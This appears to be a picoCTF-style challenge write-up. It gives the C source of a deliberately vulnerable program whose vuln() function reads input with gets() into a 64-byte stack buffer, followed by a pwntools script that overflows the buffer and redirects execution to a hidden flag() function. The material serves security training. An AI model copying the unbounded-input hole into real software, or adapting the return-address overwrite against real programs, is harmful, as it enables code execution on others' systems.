Source
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFFSIZE 64
#define FLAGSIZE 64
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFFSIZE];
gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
vuln();
return 0;
}
Solution
#!/usr/bin/env python3
from pwn import *
exe = ELF("./vuln_patched")
context.binary = exe
context.arch = "amd64"
def conn():
if args.REMOTE:
r = remote("saturn.picoctf.net", 61143)
else:
r = process([exe.path])
return r
def main():
r = conn()
offset = 72
p = b'i' * offset + p64(0x40123b)
r.sendlineafter(b'flag',p)
flag = r.recvallS()
print(flag)
if __name__ == "__main__":
main()